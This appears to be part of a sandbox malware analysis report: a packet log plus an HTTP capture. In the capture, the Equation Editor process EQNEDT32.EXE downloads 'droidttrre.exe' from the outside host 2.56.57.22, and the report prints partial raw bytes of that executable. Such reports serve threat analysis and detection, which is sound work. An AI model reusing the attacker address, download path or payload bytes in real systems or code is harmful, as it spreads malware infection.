May 27, 2022 12:02:27.464718103 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464730024 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464735985 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464752913 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464771986 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464776993 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464786053 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464798927 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464806080 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464823008 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464843035 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464848042 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464857101 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464870930 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464879036 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464894056 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464901924 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464919090 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464927912 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464941978 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464950085 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464966059 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464975119 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464988947 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464998960 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465012074 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465014935 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465035915 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465045929 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465060949 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465063095 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465085030 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465095997 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465106964 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465121031 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465130091 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465145111 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465152025 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465157986 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465176105 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465193033 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465198040 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465207100 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465221882 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465229034 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465245008 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465255022 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465269089 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465276957 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465291977 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465302944 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465316057 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465325117 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465338945 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465339899 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465363026 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465385914 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465406895 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465409994 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465424061 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465429068 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465432882 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465456963 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465464115 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465481043 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465487003 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465503931 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465512991 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465527058 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465529919 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465552092 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465554953 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465575933 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465579987 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465600014 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465605021 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465622902 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465631008 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465648890 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465657949 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465672970 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465677977 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465693951 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465698957 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465718031 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465723038 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465742111 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465747118 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465764999 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465770006 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465787888 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465791941 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465811014 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465816975 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465835094 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465840101 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465858936 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465862036 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465882063 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465892076 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465904951 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465909004 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465926886 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465931892 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465950966 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465955973 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465975046 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.465979099 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.465996981 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466002941 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466022015 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466026068 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466047049 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466052055 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466069937 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466075897 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466094017 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466099024 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466118097 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466123104 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466140985 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466145992 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466165066 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466170073 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466188908 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466193914 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466213942 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466217041 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466238022 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466248035 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466259956 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466263056 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466284037 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466296911 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466306925 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466319084 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466332912 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466337919 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466362000 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466366053 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466384888 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466391087 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466409922 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466415882 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466433048 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466439009 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466456890 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466463089 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466480970 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466485023 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466504097 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466509104 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466526985 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466533899 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466552019 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466557026 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466573954 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466579914 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466598034 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466603994 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466622114 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466625929 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466645002 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466650009 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466667891 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466674089 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466691971 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466700077 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466713905 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466720104 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466738939 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466743946 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466762066 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466768026 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466784954 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466790915 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466808081 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466814041 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466830015 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466835976 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466854095 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466870070 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466876030 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466882944 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466898918 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466903925 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466923952 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466929913 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466947079 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466953039 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466970921 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466974974 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.466995001 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.466999054 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.467017889 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.467024088 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.467042923 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.467045069 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.467067003 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.467071056 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.467091084 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.467099905 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.467113972 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.467116117 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.467138052 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.467143059 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.467164040 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.467170954 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.467186928 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.467192888 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.467211008 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.467215061 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.467236042 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.467241049 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.467257023 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.467263937 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.467284918 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.496272087 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:35.416110992 CEST	49171	80	192.168.2.22	2.56.57.22

HTTP Request Dependency Graph

2.56.57.22

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49171	2.56.57.22	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
May 27, 2022 12:02:27.168530941 CEST	2	OUT	GET /droidttrre.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 2.56.57.22 Connection: Keep-Alive
May 27, 2022 12:02:27.198072910 CEST	3	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 24 May 2022 18:13:44 GMT Accept-Ranges: bytes ETag: "abe39719a6fd81:0" Server: Microsoft-IIS/10.0 Date: Fri, 27 May 2022 10:02:27 GMT Content-Length: 1449584 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1f 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 2a 02 00 00 08 00 00 40 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 07 00 00 04 00 00 5b e9 16 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 b0 05 00 68 2d 02 00 00 00 00 00 00 00 00 00 50 ff 15 00 20 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 03 02 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 03 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 68 2d 02 00 00 b0 05 00 00 2e 02 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 68 a2 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00 53 56 8b 35 70 a2 42 00 8d 45 a4 57 50 ff 75 08 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf_9PfPgLPf_;PfsVPf.V`PfRichPfPELOah*@6@[@h-P .textvfh `.rdatal@@.datax@.ndata.rsrch-.@@U\}t+}FEuHhBHPuuu@BSV5pBEWPu
May 27, 2022 12:02:27.198128939 CEST	5	IN	Data Raw: ff 15 88 82 40 00 83 65 f4 00 89 45 0c 8d 45 e4 50 ff 75 08 ff 15 94 81 40 00 8b 7d f0 83 65 f0 00 8b 1d 60 80 40 00 e9 80 00 00 00 0f b6 46 52 0f b6 56 56 0f af 55 e8 8b cf 2b 4d e8 0f af c1 03 c2 89 4d 10 99 f7 ff 33 d2 8a f0 0f b6 46 51 0f af Data Ascii: @eEEPu@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu@uE9}w~Xtev4X@EtU}jWEEL@vXWd@u
May 27, 2022 12:02:27.198162079 CEST	6	IN	Data Raw: 74 09 ff 75 d4 51 ff d6 8b 45 d0 8b 0d 44 92 42 00 3b cb 0f 84 90 16 00 00 50 51 ff d6 e9 87 16 00 00 6a f0 e8 fc 17 00 00 ff 75 d4 50 ff 15 00 81 40 00 85 c0 0f 85 6e 16 00 00 e9 6d 13 00 00 6a f0 e8 de 17 00 00 50 89 45 08 e8 11 4a 00 00 8b f0 Data Ascii: tuQEDB;PQjuP@nmjPEJ;tZj\VIf>ff;u9]t=FtuEuF;t=uu@uEf>FFf;u9]t-juh`CPu@EjS6P(S
May 27, 2022 12:02:27.198191881 CEST	7	IN	Data Raw: 6a 02 89 55 f0 89 75 08 e8 bc 12 00 00 59 89 55 f0 59 8b c8 8b 45 dc 83 f8 0d 0f 87 94 00 00 00 ff 24 85 4c 2d 40 00 03 f1 e9 5f 03 00 00 2b f1 e9 58 03 00 00 0f af ce eb 1a 3b cb 74 53 8b c6 99 f7 f9 8b f0 e9 43 03 00 00 0b ce eb 06 23 ce eb 02 Data Ascii: jUuYUYE$L-@_+X;tSC#323;;u3;t;t3F;t3Euj(jPVWUT@E5X@;tDH;
May 27, 2022 12:02:27.198234081 CEST	9	IN	Data Raw: 00 6a 02 e8 a9 0d 00 00 50 e8 9b 49 00 00 8b f0 3b f3 74 13 ff 76 14 ff 75 f4 e8 9b 45 00 00 ff 76 18 e9 51 f5 ff ff 8b 45 f4 66 89 1f 66 89 18 e9 04 09 00 00 6a ee e8 75 0d 00 00 8d 4d f0 89 45 c8 51 50 6a 0a e8 f5 49 00 00 ff d0 8b f0 8b 45 f4 Data Ascii: jPI;tvuEvQEffjuMEQPjIEf;fEVj@8@;EjIjEIuEVSuUt<EPEPh@uUt%EMtWDEMtuD]u49 BE
May 27, 2022 12:02:27.198255062 CEST	10	IN	Data Raw: e8 b2 08 00 00 6a 33 8b f0 e8 69 08 00 00 3b f3 66 89 1f 0f 84 e6 03 00 00 8d 4d f0 c7 45 f0 00 08 00 00 51 8d 4d 08 57 51 53 50 56 ff 15 08 80 40 00 33 c9 41 85 c0 75 2e 83 7d 08 04 74 13 39 4d 08 74 06 83 7d 08 02 75 1d 8b 45 e0 89 45 fc eb 74 Data Ascii: j3i;fMEQMWQSPV@3Au.}t9Mt}uEEt739]WE@ffM^h>j;YUfn9]MtQWPV@SSSMSQWPV0@tEfV@"W?;Pj
May 27, 2022 12:02:27.198278904 CEST	12	IN	Data Raw: 00 89 55 f0 0f 83 bb fe ff ff 8b f7 8b 45 d8 69 f6 18 08 00 00 03 35 88 a2 42 00 3b c3 7c 1c 8b 0c 86 75 11 83 c6 18 56 ff 75 f4 e8 cf 3b 00 00 e9 8c 01 00 00 51 e9 fd 00 00 00 83 c9 ff 2b c8 89 4d d8 74 10 6a 01 e8 cf 02 00 00 59 89 55 f0 89 45 Data Ascii: UEi5B;\|uVu;Q+MtjYUEuFP;NEM9]JW?S YU09]t"9]tPSSS9]tpBMpBuQ;E
May 27, 2022 12:02:27.198302031 CEST	13	IN	Data Raw: 75 19 6a 00 68 fa 00 00 00 6a 01 ff 75 08 ff 15 40 82 40 00 c7 45 0c 13 01 00 00 81 7d 0c 13 01 00 00 75 45 e8 46 00 00 00 83 3d 70 a2 42 00 00 b9 54 a0 40 00 75 05 b9 20 a0 40 00 50 8d 45 80 51 50 ff 15 54 82 40 00 83 c4 0c 8d 45 80 50 ff 75 08 Data Ascii: ujhju@@E}uEF=pBT@u @PEQPT@EPuD@EPhu,3BB;rPjdQ@UV39utB;tP8@5Bv95BtV:f@;lBvX95hBt-BtGPEh@P
May 27, 2022 12:02:27.198326111 CEST	14	IN	Data Raw: 00 40 00 00 2b 05 04 0f 42 00 3b c7 7f 02 8b f8 be f0 4e 41 00 57 56 e8 e9 00 00 00 85 c0 0f 84 c2 00 00 00 01 3d 04 0f 42 00 89 35 80 ce 40 00 89 3d 84 ce 40 00 39 1d 70 a2 42 00 74 29 39 1d 00 a3 42 00 75 21 a1 00 0f 42 00 53 2b 05 f4 0e 42 00 Data Ascii: @+B;NAWV=B5@=@9pBt)9Bu!BS+B+D$`@BYh@-@@R6\|j5@+t!VU5@,tK5`@9@u9@u7;t3B+`@L$%SSP5@`@jjX
